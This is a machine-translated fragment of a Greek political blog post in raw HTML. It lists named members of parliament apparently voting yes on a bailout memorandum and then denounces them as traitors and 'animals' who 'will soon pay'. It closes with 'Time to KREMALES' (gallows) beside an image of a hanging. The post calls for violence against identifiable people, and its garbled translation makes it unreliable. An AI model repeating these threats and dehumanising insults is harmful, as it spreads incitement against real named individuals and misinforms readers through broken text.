Arabatzis Luminous YES</b> <b><br /></b> <b>Leontaridis Chris Theophilus YES</b> <b><br /></b> <b>Vlachogiannis George Elias YES</b> <b><br /></b> <b>Skrekas Theodore Constantine YES</b> <b><br /></b> <b>Michael Constantine Tamilos YES</b> <b><br /></b> <b>Christos Constantinou Staikouras YES</b> <b><br /></b> <b>Koutsogiannakopoulos John Constantine YES</b> <b><br /></b> <b>Makris, Evangelos Theodorou Helen YES</b> <b><br /></b> <b>George Constantinides Eustatius YES</b> <b><br /></b> <b>Mandreka Panagiotis Aspasia YES</b> <b><br /></b> <b>Karanasios Kingdom Timmy YES</b> <b><br /></b> <b>John Constantine Drivelegkas YES</b> <b><br /></b> <b>Chris Emmanuel Markogiannakis YES</b> <b><br /></b> <b>Voloudakis George Manousos - Constantine YES</b> <b><br /></b> <b>Epaminondas Virvidakis Kyriakos YES</b> <b><br /></b> <b>Constantinos Demetriou Mousouroulis YES</b> <b><br /></b> <b>Triantafyllos Demosthenes Constantine YES</b><br />
<b> </b> <br />
<b> </b> <span style="font-size: medium;"><b>No
third memorandum will not be implemented in practice with 15 3 votes
one trikommatikis government hides and collaborators which today does
not make either 10% overall rate ....</b></span> <span style="font-size: medium;"><b>I
would not dare these animals were to emerge from the burrow by
tomorrow. The next poll will be found with the euro and Europe in the
ass. Finished and will soon pay for his betrayal.</b></span> <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOcg2FOhX3ywlIgcYEJZAlrgOdz-9-dTUP1TS6ph6d0bGPHvj8NA_zJKGupwWkF_LIn1S99uNj3KY4IXbBBoCMwGgzqwJux1uYBOu534Rh_ydjmLAXnHcQ7ilg0Sz1ETamKlcZvgl_HOM/s1600/863072.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOcg2FOhX3ywlIgcYEJZAlrgOdz-9-dTUP1TS6ph6d0bGPHvj8NA_zJKGupwWkF_LIn1S99uNj3KY4IXbBBoCMwGgzqwJux1uYBOu534Rh_ydjmLAXnHcQ7ilg0Sz1ETamKlcZvgl_HOM/s1600/863072.jpg" /></a> </div>
<span style="font-size: small;"><b>"Yes
to all" by the House Hellenized tourist grabbing 8 grand a month to
kaaaathetai and vote against the people who once made him a god
because of the crap that beats this one people ... real Greek would
never have voted for the extermination of the Greek people.</b></span> <span style="font-size: small;"><b>There are 153 Greeks these hides.</b></span> <span style="font-size: small;"><b>It only hides.</b></span> <br />
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kr7KwZPAFuaUu3_oVeParOqLC4Je67NXlFYZwjzzqLmw8r9uaVKAfNBAB0QPzRiYXajpOhVEUctTjYP4tx8epwHkbCzNbcp7aBdH-dquz7ne2WhGAW7_mBkXEQix3XtgyqazPrsNwD0/s1600/gynaika-vrethike-kremasmeni-mesa-sto-farmakeio-tis-stin-arta-1-315x236.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kr7KwZPAFuaUu3_oVeParOqLC4Je67NXlFYZwjzzqLmw8r9uaVKAfNBAB0QPzRiYXajpOhVEUctTjYP4tx8epwHkbCzNbcp7aBdH-dquz7ne2WhGAW7_mBkXEQix3XtgyqazPrsNwD0/s400/gynaika-vrethike-kremasmeni-mesa-sto-farmakeio-tis-stin-arta-1-315x236.jpg" width="315" /></a> </div>
Time to KREMALES<br />
<br />
<span><span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhj2qsugHGx3K4TkGfl8B4leJQJeQA" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span> <span class="post-timestamp">#greek #source</span></span> </div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0